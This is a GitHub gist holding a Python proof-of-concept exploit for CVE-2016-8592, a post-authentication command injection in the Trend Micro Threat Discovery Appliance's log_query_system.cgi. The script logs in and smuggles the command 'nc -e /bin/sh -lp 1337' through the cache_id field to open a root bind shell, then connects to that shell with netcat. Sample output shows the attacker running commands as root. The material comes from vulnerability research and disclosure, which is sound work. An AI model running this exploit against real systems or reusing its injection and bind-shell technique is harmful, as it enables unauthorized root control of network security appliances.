Created
April 11, 2017 08:06
-
-
Save malerisch/0c78e49124561524fd59d6635007eefd to your computer and use it in GitHub Desktop.
CVE-2016-8592 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 (latest) log_query_system.cgi Command Injection Remote Code Execution Vulnerability
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/local/bin/python | |
""" | |
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_system.cgi Remote Code Execution Vulnerability | |
Found by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/ | |
File: TDA_InstallationCD.2.6.1062r1.en_US.iso | |
sha1: 8da4604c92a944ba8f7744641bce932df008f9f9 | |
Download: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1 | |
Summary: | |
======== | |
There exists a post authenticated command injection vulnerability that can be used to execute arbitrary code as root. | |
Notes: | |
====== | |
- Since this is a busybox, getting a connectback seemed hard. So, for this particular PoC, all I did was | |
exec a bind shell using netcat. | |
- Auth is VERY weak, no privilege seperation, no username required, no password policy, no protection from bruteforce attempts... | |
Example: | |
======== | |
saturn:trend_micro_threat_discovery_log_query_system_rce mr_me$ ./poc.py | |
(+) usage: ./poc.py <target> <pass> | |
(+) eg: ./poc.py 172.16.175.123 admin123 | |
saturn:trend_micro_threat_discovery_log_query_system_rce mr_me$ ./poc.py 172.16.175.123 admin123 | |
(+) logged in... | |
(+) starting backdoor, this will take a few secs... | |
(+) calling backdoor! | |
id | |
uid=0(root) gid=0(root) | |
uname -a | |
Linux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown | |
exit | |
""" | |
import re | |
import os | |
import sys | |
import time | |
import requests | |
import threading | |
requests.packages.urllib3.disable_warnings() | |
if len(sys.argv) != 3: | |
print "(+) usage: %s <target> <pass>" % sys.argv[0] | |
print "(+) eg: %s 172.16.175.123 admin123" % sys.argv[0] | |
sys.exit(-1) | |
t = sys.argv[1] | |
p = sys.argv[2] | |
bu = "https://%s/" % t | |
l_url = "%scgi-bin/logon.cgi" % bu | |
e_url = "%scgi-bin/log_query_system.cgi" % bu | |
s = requests.Session() | |
def exec_bd(s, e_url): | |
# now we setup our backdoor | |
# no reverse, since it seems to fail !? | |
netcat = "test|`nc -e /bin/sh -lp 1337`" | |
s.post(e_url, data={'act':'search','cache_id': netcat}, verify=False) | |
# first we login... | |
r = s.post(l_url, data={ "passwd":p, "isCookieEnable":1 }, verify=False) | |
if "frame.cgi" in r.text: | |
print "(+) logged in..." | |
thread = threading.Thread(target=exec_bd, args=(s, e_url,)) | |
thread.start() | |
print "(+) starting backdoor, this will take a few secs..." | |
time.sleep(2) | |
print "(+) calling backdoor!" | |
os.system("nc %s 1337" % t) | |
else: | |
print "(-) login failed" | |
sys.exit(-1) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment